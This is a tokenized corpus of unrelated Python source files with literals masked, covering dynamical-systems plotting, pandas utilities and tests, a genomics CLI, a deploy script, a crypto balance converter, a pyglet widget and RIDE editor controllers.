'<STR_LIT>' ) <EOL> plt . xlabel ( '<STR_LIT:x>' ) <EOL> plt . ylabel ( '<STR_LIT:y>' ) <EOL> plt . figure ( <NUM_LIT:3> ) <EOL> vdp . set ( tdata = [ <NUM_LIT:0> , <NUM_LIT:30> ] , <EOL> xdomain = { '<STR_LIT:y>' : [ - <NUM_LIT:8> , <NUM_LIT:8> ] } , <EOL> algparams = { '<STR_LIT>' : <NUM_LIT> } ) <EOL> for eps in np . power ( <NUM_LIT:10> , np . linspace ( - <NUM_LIT:2> , <NUM_LIT> , <NUM_LIT:6> ) ) : <EOL> vdp . set ( pars = { '<STR_LIT>' : eps } , <EOL> tdata = [ <NUM_LIT:0> , vdp . tdata [ <NUM_LIT:1> ] + <NUM_LIT> ] ) <EOL> traj = vdp . compute ( '<STR_LIT>' % eps ) <EOL> pts = traj . sample ( ) <EOL> event_dict = pts . labels . by_label [ '<STR_LIT>' ] <EOL> indices = np . sort ( event_dict . keys ( ) ) <EOL> ix1 , ix2 , ix3 = indices [ - <NUM_LIT:3> : ] <EOL> plt . plot ( pts [ '<STR_LIT:x>' ] [ ix1 : ix3 + <NUM_LIT:1> ] , pts [ '<STR_LIT:y>' ] [ ix1 : ix3 + <NUM_LIT:1> ] , label = '<STR_LIT>' % eps ) <EOL> nulls_x , nulls_y = pp . find_nullclines ( vdp , '<STR_LIT:x>' , '<STR_LIT:y>' , n = <NUM_LIT:3> , eps = <NUM_LIT> , <EOL> max_step = <NUM_LIT> , fps = [ fp_coord ] ) <EOL> plt . plot ( nulls_x [ : , <NUM_LIT:0> ] , nulls_x [ : , <NUM_LIT:1> ] , '<STR_LIT:k>' , lw = <NUM_LIT:2> ) <EOL> plt . plot ( nulls_y [ : , <NUM_LIT:0> ] , nulls_y [ : , <NUM_LIT:1> ] , '<STR_LIT:k>' , lw = <NUM_LIT:2> ) <EOL> pp . plot_PP_fps ( fp ) <EOL> plt . axis ( '<STR_LIT>' ) <EOL> plt . title ( '<STR_LIT>' ) <EOL> plt . xlabel ( '<STR_LIT:x>' ) <EOL> plt . ylabel ( '<STR_LIT:y>' ) <EOL> plt . legend ( loc = <NUM_LIT:3> ) <EOL> plt . show ( ) </s>
<s> from PyDSTool import * <EOL> from common_lib import * <EOL> thresh_ev = Events . makeZeroCrossEvent ( '<STR_LIT>' , <NUM_LIT:1> , <EOL> { '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : False } , <EOL> varnames = [ '<STR_LIT:x>' ] ) <EOL> unused_ev = Events . makeZeroCrossEvent ( '<STR_LIT>' , <NUM_LIT:1> , <EOL> { '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : False } , <EOL> varnames = [ '<STR_LIT:x>' ] ) <EOL> DSargs = { '<STR_LIT>' : [ <NUM_LIT:0> , <NUM_LIT:20> ] , <EOL> '<STR_LIT>' : { '<STR_LIT:k>' : <NUM_LIT:0> , '<STR_LIT:a>' : <NUM_LIT:0> } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : <NUM_LIT> , '<STR_LIT:strict>' : False } , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { "<STR_LIT:x>" : "<STR_LIT>" } , <EOL> '<STR_LIT>' : [ thresh_ev , unused_ev ] <EOL> } <EOL> testODE = Vode_ODEsystem ( DSargs ) <EOL> protocol = [ ] <EOL> protocol . append ( { '<STR_LIT>' : { '<STR_LIT:x>' : <NUM_LIT:0> } , <EOL> '<STR_LIT>' : { '<STR_LIT:k>' : <NUM_LIT:0> , '<STR_LIT:a>' : <NUM_LIT:1> } , <EOL> '<STR_LIT>' : <NUM_LIT:1> } ) <EOL> protocol . append ( { '<STR_LIT>' : { '<STR_LIT:x>' : <NUM_LIT:0> } , <EOL> '<STR_LIT>' : { '<STR_LIT:k>' : <NUM_LIT:0> , '<STR_LIT:a>' : <NUM_LIT:1> } , <EOL> '<STR_LIT>' : <NUM_LIT:1> } ) <EOL> protocol . append ( { '<STR_LIT>' : { '<STR_LIT:x>' : <NUM_LIT:0> } , <EOL> '<STR_LIT>' : { '<STR_LIT:k>' : <NUM_LIT:0> , '<STR_LIT:a>' : <NUM_LIT:1> } , <EOL> '<STR_LIT>' : <NUM_LIT:1> } ) <EOL> traj , pts = pcw_protocol ( testODE , protocol ) <EOL> plot ( pts [ '<STR_LIT:t>' ] , pts [ '<STR_LIT:x>' ] ) <EOL> show ( ) </s>
<s> from collections import Counter <EOL> import pandas as pd <EOL> import numpy as np <EOL> def sigma_edit_series ( sigma_thresh , in_series , iter_counter = None , max_iter = <NUM_LIT:20> ) : <EOL> iter_counter = Counter ( ) if iter_counter is None else iter_counter <EOL> if in_series . count ( ) == <NUM_LIT:0> : <EOL> msg = "<STR_LIT>" <EOL> raise ValueError ( msg ) <EOL> iter_counter . update ( '<STR_LIT:n>' ) <EOL> if iter_counter [ '<STR_LIT:n>' ] > max_iter : <EOL> msg = "<STR_LIT>" <EOL> raise ValueError ( msg ) <EOL> resid = in_series - in_series . mean ( ) <EOL> std = resid . std ( ) <EOL> sigma_t = sigma_thresh * std <EOL> outside = resid . abs ( ) >= sigma_t <EOL> if any ( outside ) : <EOL> in_series . loc [ outside ] = np . NaN <EOL> in_series = sigma_edit_series ( <EOL> sigma_thresh , in_series , iter_counter , max_iter ) <EOL> return in_series <EOL> def ensure_col_exists ( df , col , df_name = '<STR_LIT>' ) : <EOL> if not df . empty and col not in list ( df . columns ) : <EOL> msg = '<STR_LIT>' . format ( <EOL> df_name , repr ( col ) ) <EOL> raise ValueError ( msg ) <EOL> def sigma_edit_dataframe ( sigma_thresh , columns , df , max_iter = <NUM_LIT:20> ) : <EOL> """<STR_LIT>""" <EOL> pd . options . mode . chained_assignment = None <EOL> for col in columns : <EOL> ensure_col_exists ( df , col , '<STR_LIT>' ) <EOL> ser = df [ col ] <EOL> df . loc [ : , col ] = sigma_edit_series ( sigma_thresh , ser , max_iter = max_iter ) <EOL> return df </s>
<s> from mock import patch , MagicMock <EOL> from unittest import TestCase <EOL> import pandas as pd <EOL> from pandashells . bin . p_smooth import main , get_input_args , validate_args <EOL> class GetInputArgsTests ( TestCase ) : <EOL> @ patch ( '<STR_LIT>' , '<STR_LIT>' . split ( ) ) <EOL> def test_right_number_of_args ( self ) : <EOL> args = get_input_args ( ) <EOL> self . assertEqual ( len ( args . __dict__ ) , <NUM_LIT:6> ) <EOL> class ValidateArgs ( TestCase ) : <EOL> def test_okay ( self ) : <EOL> args = MagicMock ( quiet = False ) <EOL> cols = [ '<STR_LIT:a>' ] <EOL> df = MagicMock ( columns = [ '<STR_LIT:a>' ] ) <EOL> validate_args ( args , cols , df ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_bad_cols ( self , stderr_mock ) : <EOL> args = MagicMock ( quiet = False ) <EOL> cols = [ '<STR_LIT:b>' ] <EOL> df = MagicMock ( columns = [ '<STR_LIT:a>' ] ) <EOL> with self . assertRaises ( SystemExit ) : <EOL> validate_args ( args , cols , df ) <EOL> class MainTests ( TestCase ) : <EOL> @ patch ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' . split ( ) ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_cli ( self , df_from_input_mock , df_to_output_mock ) : <EOL> df_in = pd . DataFrame ( { <EOL> '<STR_LIT:x>' : range ( <NUM_LIT:1> , <NUM_LIT> ) , <EOL> '<STR_LIT:y>' : range ( <NUM_LIT:1> , <NUM_LIT> ) , <EOL> } ) <EOL> df_from_input_mock . return_value = df_in <EOL> main ( ) <EOL> dfout = df_to_output_mock <EOL> self . assertEqual ( <EOL> list ( dfout . call_args_list [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] . columns ) , [ '<STR_LIT:x>' , '<STR_LIT:y>' ] ) </s>
<s> import logging <EOL> import click <EOL> from sqlalchemy . exc import IntegrityError <EOL> from chanjo . load import link as link_mod <EOL> from chanjo import load <EOL> from chanjo . parse import bed <EOL> from chanjo . store import Store <EOL> from chanjo . utils import validate_stdin <EOL> from chanjo . store . models import BASE <EOL> from chanjo . store . txmodels import BASE as TXBASE <EOL> logger = logging . getLogger ( __name__ ) <EOL> @ click . command ( ) <EOL> @ click . option ( '<STR_LIT>' , '<STR_LIT>' , is_flag = True , <EOL> help = '<STR_LIT>' ) <EOL> @ click . argument ( '<STR_LIT>' , callback = validate_stdin , <EOL> type = click . File ( encoding = '<STR_LIT:utf-8>' ) , default = '<STR_LIT:->' , required = False ) <EOL> @ click . pass_context <EOL> def link ( context , transcripts , bed_stream ) : <EOL> """<STR_LIT>""" <EOL> only_tx = transcripts or context . obj . get ( '<STR_LIT>' ) or False <EOL> base = TXBASE if only_tx else BASE <EOL> chanjo_db = Store ( uri = context . obj [ '<STR_LIT>' ] , base = base ) <EOL> try : <EOL> if only_tx : <EOL> result = load . link_transcripts ( bed_stream ) <EOL> with click . progressbar ( result . models , length = result . count , <EOL> label = '<STR_LIT>' ) as bar : <EOL> for tx_model in bar : <EOL> chanjo_db . session . add ( tx_model ) <EOL> chanjo_db . save ( ) <EOL> else : <EOL> link_elements ( chanjo_db , bed_stream ) <EOL> except IntegrityError : <EOL> click . echo ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def link_elements ( chanjo_db , bed_iterable , batch_size = <NUM_LIT> ) : <EOL> """<STR_LIT>""" <EOL> rows = bed . chanjo ( bed_iterable ) <EOL> stats = link_mod . rows ( chanjo_db . session , rows ) <EOL> for index , stat in enumerate ( stats ) : <EOL> chanjo_db . add ( stat ) <EOL> if index % batch_size == <NUM_LIT:0> : <EOL> chanjo_db . save ( ) <EOL> logger . debug ( '<STR_LIT>' , index ) <EOL> chanjo_db . save ( ) </s>
<s> from . api import ChanjoAPI <EOL> from . core import Store <EOL> from . models import ( Exon , ExonStatistic , Exon_Transcript , Gene , Sample , <EOL> Transcript ) </s>
<s> import os <EOL> from fabric . api import env , run , put , local , roles <EOL> env . hosts = [ '<STR_LIT>' ] <EOL> env . roledefs = { '<STR_LIT>' : [ '<STR_LIT>' ] } <EOL> env . user = '<STR_LIT>' <EOL> @ roles ( '<STR_LIT>' ) <EOL> def deploy ( ) : <EOL> local ( '<STR_LIT>' ) <EOL> local ( '<STR_LIT>' ) <EOL> dist_files = os . listdir ( '<STR_LIT>' ) <EOL> filename = dist_files [ <NUM_LIT:0> ] <EOL> local_filename = '<STR_LIT>' % filename <EOL> remote_filename = '<STR_LIT>' % filename <EOL> put ( local_filename , remote_filename ) </s>
<s> from tempfile import mkdtemp <EOL> from git import Repo <EOL> from jig . tests . testcase import JigTestCase <EOL> from jig . plugins import initializer <EOL> from jig . gitutils . checks import ( <EOL> is_git_repo , repo_jiginitialized , working_directory_dirty ) <EOL> class TestIsGitRepo ( JigTestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_is_not_git_directory ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertFalse ( is_git_repo ( mkdtemp ( ) ) ) <EOL> def test_is_git_directory ( self ) : <EOL> """<STR_LIT>""" <EOL> directory = mkdtemp ( ) <EOL> Repo . init ( directory ) <EOL> self . assertTrue ( is_git_repo ( directory ) ) <EOL> class TestRepoJiginitialized ( JigTestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_is_not_jig_initialized_directory ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertFalse ( repo_jiginitialized ( mkdtemp ( ) ) ) <EOL> def test_is_jig_initialized_directory ( self ) : <EOL> """<STR_LIT>""" <EOL> directory = mkdtemp ( ) <EOL> Repo . init ( directory ) <EOL> initializer ( directory ) <EOL> self . assertTrue ( repo_jiginitialized ( directory ) ) <EOL> class TestWorkingDirctoryDirty ( JigTestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> super ( TestWorkingDirctoryDirty , self ) . setUp ( ) <EOL> self . commit ( self . gitrepodir , '<STR_LIT>' , '<STR_LIT:a>' ) <EOL> self . commit ( self . gitrepodir , '<STR_LIT>' , '<STR_LIT:b>' ) <EOL> self . commit ( self . gitrepodir , '<STR_LIT>' , '<STR_LIT:c>' ) <EOL> def test_directory_is_clean ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertFalse ( working_directory_dirty ( self . gitrepodir ) ) <EOL> def test_directory_has_modified_file ( self ) : <EOL> """<STR_LIT>""" <EOL> self . modify_file ( self . gitrepodir , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assertTrue ( working_directory_dirty ( self . gitrepodir ) ) <EOL> def test_directory_has_untracked_file ( self ) : <EOL> """<STR_LIT>""" <EOL> self . create_file ( self . gitrepodir , '<STR_LIT>' , '<STR_LIT:d>' ) <EOL> self . assertFalse ( working_directory_dirty ( self . gitrepodir ) ) </s>
<s> """<STR_LIT>""" <EOL> import urllib . request <EOL> import models <EOL> import json <EOL> import sys <EOL> from decimal import * <EOL> from urllib . error import URLError , HTTPError <EOL> getcontext ( ) . prec = <NUM_LIT:8> <EOL> def get_bitstamp_price ( ) : <EOL> """<STR_LIT>""" <EOL> req = urllib . request . urlopen ( '<STR_LIT>' ) <EOL> ret = req . read ( ) . decode ( ) <EOL> ret = json . loads ( ret ) <EOL> return Decimal ( ret [ '<STR_LIT>' ] ) <EOL> def get_balances ( ) : <EOL> """<STR_LIT>""" <EOL> if not hasattr ( get_balances , '<STR_LIT>' ) : <EOL> bals = models . Wallet . get_balances ( ) <EOL> for bal in bals : <EOL> bal . amount += bal . held <EOL> bal . held = Decimal ( <NUM_LIT:0> ) <EOL> get_balances . _balances = bals <EOL> return get_balances . _balances <EOL> def get_amt_in_btc ( bal ) : <EOL> """<STR_LIT>""" <EOL> if bal . currency . abbreviation == '<STR_LIT>' : <EOL> return bal . amount <EOL> for exchange in models . Exchange . get_all ( ) : <EOL> to_correct = exchange . to_currency == bal . currency <EOL> from_correct = exchange . from_currency . abbreviation == '<STR_LIT>' <EOL> if to_correct and from_correct : <EOL> break <EOL> else : <EOL> raise ValueError ( <EOL> '<STR_LIT>' . format ( <EOL> bal . currency . abbreviation <EOL> ) <EOL> ) <EOL> ordr = exchange . get_highest_bid ( ) <EOL> return Decimal ( bal . amount * ordr . rate ) <EOL> def get_amt_in_usd ( btc ) : <EOL> """<STR_LIT>""" <EOL> return Decimal ( btc * get_bitstamp_price ( ) ) <EOL> def main ( ) : <EOL> """<STR_LIT>""" <EOL> btc = Decimal ( <NUM_LIT:0> ) <EOL> try : <EOL> for balance in get_balances ( ) : <EOL> try : <EOL> btc += get_amt_in_btc ( balance ) <EOL> except ValueError : <EOL> sys . stderr . write ( <EOL> '<STR_LIT>' . format ( <EOL> balance . currency . abbreviation <EOL> ) <EOL> ) <EOL> pass <EOL> except HTTPError as e : <EOL> print ( "<STR_LIT>" . format ( e . code ) ) <EOL> print ( "<STR_LIT>" ) <EOL> return <EOL> btc_str = '<STR_LIT>' . format ( btc ) <EOL> print ( '<STR_LIT>' . format ( btc_str ) ) <EOL> try : <EOL> usd = get_amt_in_usd ( btc ) <EOL> except HTTPError as e : <EOL> print ( "<STR_LIT>" . format ( e . code ) ) <EOL> print ( "<STR_LIT>" ) <EOL> return <EOL> usd_str = '<STR_LIT>' . format ( usd ) <EOL> print ( '<STR_LIT>' . format ( usd_str ) ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> import math <EOL> import Rat <EOL> import itertools <EOL> def old_convert_integers_by_ratio ( ratio , num_inputs , src_offset = <NUM_LIT:0> , dest_offset = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> max_taken = - <NUM_LIT:1> <EOL> for in_frame in xrange ( <NUM_LIT:0> , num_inputs ) : <EOL> out_frame = int ( math . floor ( ( in_frame + <NUM_LIT:1> ) * ratio ) ) - <NUM_LIT:1> <EOL> if out_frame > max_taken : <EOL> for copy in xrange ( max_taken + <NUM_LIT:1> , out_frame + <NUM_LIT:1> ) : <EOL> yield ( in_frame + src_offset , copy + dest_offset ) <EOL> max_taken = out_frame <EOL> def convert_integers_by_ratio ( ratio , num_inputs , src_offset = <NUM_LIT:0> , dest_offset = <NUM_LIT:0> ) : <EOL> return convert_integers_by_iterator_ratio ( ratio , <EOL> xrange ( src_offset , src_offset + num_inputs ) , <EOL> dest_offset = dest_offset ) <EOL> def argh ( ratio , source , dest_offset = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> if len ( source ) == <NUM_LIT:0> : <EOL> raise StopIteration ( ) <EOL> first_frame = source [ <NUM_LIT:0> ] <EOL> for in_frame in source : <EOL> rel_in_frame = in_frame - first_frame <EOL> first_rel_out_frame = int ( math . floor ( rel_in_frame * ratio ) ) <EOL> bound_rel_out_frame = int ( math . floor ( ( rel_in_frame + <NUM_LIT:1> ) * ratio ) ) <EOL> for rel_out_frame in xrange ( first_rel_out_frame , bound_rel_out_frame ) : <EOL> yield ( in_frame , rel_out_frame + dest_offset ) <EOL> def convert_integers_by_iterator_ratio ( ratio , source , dest_offset = <NUM_LIT:0> ) : <EOL> return argh ( ratio , source , dest_offset ) <EOL> def take_last_assignment ( source ) : <EOL> first = True <EOL> last = None <EOL> for assn in source : <EOL> if first : <EOL> last = assn <EOL> first = False <EOL> if assn [ <NUM_LIT:1> ] != last [ <NUM_LIT:1> ] : <EOL> yield last <EOL> last = assn <EOL> if last is not None : <EOL> yield last <EOL> def expected_number ( ratio , num_inputs ) : <EOL> return math . floor ( ratio * num_inputs ) <EOL> def ratio_for_number ( num_inputs , num_outputs ) : <EOL> return Rat . rat ( num_outputs , num_inputs ) <EOL> def frames_in_range ( bounds ) : <EOL> return bounds [ <NUM_LIT:1> ] + <NUM_LIT:1> - bounds [ <NUM_LIT:0> ] <EOL> def convert_range_to_range ( in_bounds , out_bounds ) : <EOL> num_outs = frames_in_range ( out_bounds ) <EOL> num_ins = frames_in_range ( in_bounds ) <EOL> ratio = ratio_for_number ( num_ins , num_outs ) <EOL> return convert_integers_by_ratio ( ratio , num_ins , <EOL> src_offset = in_bounds [ <NUM_LIT:0> ] , <EOL> dest_offset = out_bounds [ <NUM_LIT:0> ] ) </s>
<s> import pyglet <EOL> import pyglet . window . key as pkey <EOL> from victor . settings import TEXT_STYLE <EOL> class CommandArea ( object ) : <EOL> def __init__ ( self , x , y , width , batch ) : <EOL> self . document = pyglet . text . document . UnformattedDocument ( "<STR_LIT>" ) <EOL> self . document . set_style ( <NUM_LIT:0> , <NUM_LIT:0> , TEXT_STYLE ) <EOL> font = self . document . get_font ( ) <EOL> height = font . ascent - font . descent <EOL> self . layout = pyglet . text . layout . IncrementalTextLayout ( <EOL> self . document , width , height , multiline = False , batch = batch ) <EOL> self . caret = pyglet . text . caret . Caret ( self . layout ) <EOL> self . has_focus = False <EOL> self . layout . x = x <EOL> self . layout . y = y <EOL> self . layout . anchor_x = "<STR_LIT:left>" <EOL> self . layout . anchor_y = "<STR_LIT>" <EOL> @ property <EOL> def text ( self ) : <EOL> return self . document . text <EOL> def focus ( self ) : <EOL> self . caret . visible = True <EOL> self . document . text = "<STR_LIT::>" <EOL> self . caret . position = len ( self . document . text ) <EOL> self . has_focus = True <EOL> def unfocus ( self ) : <EOL> self . caret . visible = False <EOL> self . caret . position = <NUM_LIT:0> <EOL> self . document . text = "<STR_LIT>" <EOL> self . has_focus = False <EOL> def on_text ( self , text ) : <EOL> self . caret . on_text ( text ) <EOL> def on_text_motion ( self , motion ) : <EOL> self . caret . on_text_motion ( motion ) <EOL> if motion == pkey . MOTION_BACKSPACE and self . caret . position == <NUM_LIT:0> : <EOL> self . has_focus = False </s>
<s> from distutils . core import setup <EOL> from os . path import abspath , dirname , join <EOL> import re <EOL> NAME = '<STR_LIT>' <EOL> CLASSIFIERS = '''<STR_LIT>''' . strip ( ) . splitlines ( ) <EOL> CURDIR = dirname ( abspath ( __file__ ) ) <EOL> with open ( join ( CURDIR , '<STR_LIT:src>' , NAME + '<STR_LIT>' ) ) as source : <EOL> VERSION = re . search ( "<STR_LIT>" , source . read ( ) ) . group ( <NUM_LIT:1> ) <EOL> with open ( join ( CURDIR , '<STR_LIT>' ) ) as readme : <EOL> README = readme . read ( ) <EOL> setup ( <EOL> name = NAME , <EOL> version = VERSION , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> download_url = '<STR_LIT>' , <EOL> license = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> long_description = README , <EOL> keywords = '<STR_LIT>' , <EOL> platforms = '<STR_LIT>' , <EOL> classifiers = CLASSIFIERS , <EOL> package_dir = { '<STR_LIT>' : '<STR_LIT:src>' } , <EOL> py_modules = [ NAME ] , <EOL> ) </s>
<s> class EditorProvider ( object ) : <EOL> def __init__ ( self ) : <EOL> self . _editors = { } <EOL> def register_editor ( self , key , editor , default = True ) : <EOL> if key not in self . _editors : <EOL> self . _editors [ key ] = _EditorList ( ) <EOL> self . _editors [ key ] . add ( editor , default ) <EOL> def unregister_editor ( self , key , editor ) : <EOL> self . _editors [ key ] . remove ( editor ) <EOL> def set_active_editor ( self , key , editor ) : <EOL> self . _editors [ key ] . set_default ( editor ) <EOL> def get_editor ( self , key ) : <EOL> return self . _editors [ key ] . get ( ) <EOL> def get_editors ( self , key ) : <EOL> return self . _editors [ key ] . get_all ( ) <EOL> class _EditorList ( object ) : <EOL> def __init__ ( self ) : <EOL> self . _editors = [ ] <EOL> def add ( self , editor , default = True ) : <EOL> if editor in self . _editors : <EOL> return <EOL> if default : <EOL> self . _editors . append ( editor ) <EOL> else : <EOL> self . _editors . insert ( <NUM_LIT:0> , editor ) <EOL> def set_default ( self , editor ) : <EOL> if not self . _editors . index ( editor ) == - <NUM_LIT:1> : <EOL> self . _editors . remove ( editor ) <EOL> self . _editors . append ( editor ) <EOL> def remove ( self , editor ) : <EOL> self . _editors . remove ( editor ) <EOL> def get ( self ) : <EOL> return self . _editors [ - <NUM_LIT:1> ] <EOL> def get_all ( self ) : <EOL> return self . _editors </s>
<s> from robotide . publish import RideTestCaseRemoved , RideVariableAdded , RideVariableRemoved , RideVariableMovedUp , RideVariableMovedDown , RideUserKeywordRemoved , RideUserKeywordAdded , RideTestCaseAdded <EOL> from robotide . publish . messages import RideItemMovedUp , RideItemMovedDown <EOL> from robotide . robotapi import is_list_var , is_scalar_var , is_dict_var <EOL> from robotide import utils <EOL> from . basecontroller import ControllerWithParent <EOL> from . macrocontrollers import TestCaseController , UserKeywordController <EOL> from robotide . utils import overrides , variablematcher <EOL> from . settingcontrollers import MetadataController , ImportController , VariableController <EOL> class _WithListOperations ( object ) : <EOL> def move_up ( self , index ) : <EOL> if index > <NUM_LIT:0> : <EOL> self . _swap ( index - <NUM_LIT:1> , index ) <EOL> def move_down ( self , index ) : <EOL> if index < len ( self . _items ) - <NUM_LIT:1> : <EOL> self . _swap ( index , index + <NUM_LIT:1> ) <EOL> def _swap ( self , ind1 , ind2 ) : <EOL> self . _items [ ind1 ] , self . _items [ ind2 ] = self . _items [ ind2 ] , self . _items [ ind1 ] <EOL> self . mark_dirty ( ) <EOL> def delete ( self , index ) : <EOL> if isinstance ( self . _items , list ) : <EOL> self . _items . pop ( index ) <EOL> else : <EOL> self . _items . data . pop ( index ) <EOL> self . mark_dirty ( ) <EOL> @ property <EOL> def _items ( self ) : <EOL> raise NotImplementedError ( self . __class__ ) <EOL> def mark_dirty ( self ) : <EOL> raise NotImplementedError ( self . __class__ ) <EOL> class _TableController ( ControllerWithParent ) : <EOL> def __init__ ( self , parent_controller , table ) : <EOL> self . _parent = parent_controller <EOL> self . _table = table <EOL> class VariableTableController ( _TableController , _WithListOperations ) : <EOL> def __init__ ( self , parent_controller , table ) : <EOL> _TableController . __init__ ( self , parent_controller , table ) <EOL> self . _variable_cache = { } <EOL> def _get ( self , variable ) : <EOL> if variable not in self . _variable_cache : <EOL> self . _variable_cache [ variable ] = VariableController ( self , variable ) <EOL> return self . _variable_cache [ variable ] <EOL> def __iter__ ( self ) : <EOL> return iter ( self . _get ( v ) for v in self . _table ) <EOL> def __getitem__ ( self , index ) : <EOL> return self . _get ( self . _items [ index ] ) <EOL> def index ( self , ctrl ) : <EOL> return [ v for v in self ] . index ( ctrl ) <EOL> @ property <EOL> def _items ( self ) : <EOL> return self . _table . variables <EOL> def move_up ( self , index ) : <EOL> ctrl = self [ index ] <EOL> _WithListOperations . move_up ( self , index ) <EOL> other = self [ index ] <EOL> self . mark_dirty ( ) <EOL> RideVariableMovedUp ( item = ctrl , other = other ) . publish ( ) <EOL> def move_down ( self , index ) : <EOL> ctrl = self [ index ] <EOL> _WithListOperations . move_down ( self , index ) <EOL> other = self [ index ] <EOL> self . mark_dirty ( ) <EOL> RideVariableMovedDown ( item = ctrl , other = other ) . publish ( ) <EOL> def add_variable ( self , name , value , comment = None ) : <EOL> self . _table . add ( name , value , comment ) <EOL> self . mark_dirty ( ) <EOL> var_controller = self [ - <NUM_LIT:1> ] <EOL> self . notify_variable_added ( var_controller ) <EOL> return var_controller <EOL> def validate_scalar_variable_name ( self , name , item = None ) : <EOL> return self . _validate_name ( _ScalarVarValidator ( ) , name , item ) <EOL> def validate_list_variable_name ( self , name , item = None ) : <EOL> return self . _validate_name ( _ListVarValidator ( ) , name , item ) <EOL> def validate_dict_variable_name ( self , name , item = None ) : <EOL> return self . _validate_name ( _DictVarValidator ( ) , name , item ) <EOL> def _validate_name ( self , validator , name , item = None ) : <EOL> return VariableNameValidation ( self , validator , name , item ) <EOL> def delete ( self , index ) : <EOL> self . remove_var ( self [ index ] ) <EOL> def remove_var ( self , var_controller ) : <EOL> self . _items . remove ( var_controller . data ) <EOL> del self . _variable_cache [ var_controller . data ] <EOL> self . mark_dirty ( ) <EOL> self . notify_variable_removed ( var_controller ) <EOL> def notify_variable_added ( self , ctrl ) : <EOL> self . datafile_controller . update_namespace ( ) <EOL> RideVariableAdded ( datafile = self . datafile , <EOL> name = ctrl . name , item = ctrl , <EOL> index = ctrl . index ) . publish ( ) <EOL> def notify_variable_removed ( self , ctrl ) : <EOL> self . datafile_controller . update_namespace ( ) <EOL> RideVariableRemoved ( datafile = self . datafile , <EOL> name = ctrl . name , item = ctrl ) . publish ( ) <EOL> def contains_variable ( self , name ) : <EOL> vars_as_list = [ ] <EOL> for var in self . _items : <EOL> vars_as_list += var . as_list ( ) <EOL> return any ( variablematcher . value_contains_variable ( string , name ) <EOL> for string in vars_as_list ) <EOL> class _ScalarVarValidator ( object ) : <EOL> __call__ = lambda self , name : is_scalar_var ( name ) <EOL> name = '<STR_LIT>' <EOL> prefix = '<STR_LIT:$>' <EOL> class _ListVarValidator ( object ) : <EOL> __call__ = lambda self , name : is_list_var ( name ) <EOL> name = '<STR_LIT>' <EOL> prefix = '<STR_LIT:@>' <EOL> class _DictVarValidator ( object ) : <EOL> __call__ = lambda self , name : is_dict_var ( name ) <EOL> name = '<STR_LIT>' <EOL> prefix = '<STR_LIT:&>' <EOL> class _NameValidation ( object ) : <EOL> def __init__ ( self , table , name , named_ctrl = None ) : <EOL> self . _table = table <EOL> self . error_message = '<STR_LIT>' <EOL> self . _named_ctrl = named_ctrl <EOL> self . _validate ( name . strip ( ) ) <EOL> def _name_taken ( self , name ) : <EOL> return any ( utils . eq ( name , item . name , ignore = [ '<STR_LIT:_>' ] ) <EOL> for item in self . _table if item != self . _named_ctrl ) <EOL> class VariableNameValidation ( _NameValidation ) : <EOL> def __init__ ( self , table , validator , name , named_ctrl = None ) : <EOL> self . _validator = validator <EOL> _NameValidation . __init__ ( self , table , name , named_ctrl ) <EOL> def _validate ( self , name ) : <EOL> if not self . _validator ( name ) : <EOL> self . error_message = '<STR_LIT>' % ( self . _validator . name , self . _validator . prefix ) <EOL> if self . _name_taken ( name ) : <EOL> self . error_message = '<STR_LIT>' <EOL> class MacroNameValidation ( _NameValidation ) : <EOL> def _validate ( self , name ) : <EOL> if not name : <EOL> self . error_message = '<STR_LIT>' % self . _table . item_type <EOL> if self . _name_taken ( name ) : <EOL> self . error_message = '<STR_LIT>' % self . _table . item_type <EOL> if "<STR_LIT:\n>" in name : <EOL> self . error_message = '<STR_LIT>' % self . _table . item_type <EOL> class _MacroTable ( _TableController ) : <EOL> @ property <EOL> def _items ( self ) : <EOL> raise NotImplementedError ( self . __class__ ) <EOL> def __iter__ ( self ) : <EOL> return iter ( self . _create_controller ( item ) for item in self . _table ) <EOL> def _create_controller ( self , item ) : <EOL> if item not in self . _item_to_controller : <EOL> self . _item_to_controller [ item ] = self . _controller_class ( self , item ) <EOL> return self . _item_to_controller [ item ] <EOL> @ property <EOL> def _item_to_controller ( self ) : <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> self . _item_to_controller_attribute = { } <EOL> return self . _item_to_controller_attribute <EOL> def __len__ ( self ) : <EOL> return len ( self . _items ) <EOL> def __getitem__ ( self , index ) : <EOL> return self . _create_controller ( self . _items [ index ] ) <EOL> def move_up ( self , item ) : <EOL> items = self . _items <EOL> idx = items . index ( item ) <EOL> if idx == <NUM_LIT:0> : <EOL> return False <EOL> upper = idx - <NUM_LIT:1> <EOL> items [ upper ] , items [ idx ] = items [ idx ] , items [ upper ] <EOL> self . mark_dirty ( ) <EOL> RideItemMovedUp ( item = self . _create_controller ( item ) ) . publish ( ) <EOL> return True <EOL> def move_down ( self , item ) : <EOL> items = self . _items <EOL> idx = items . index ( item ) <EOL> if idx + <NUM_LIT:1> == len ( items ) : <EOL> return False <EOL> lower = idx + <NUM_LIT:1> 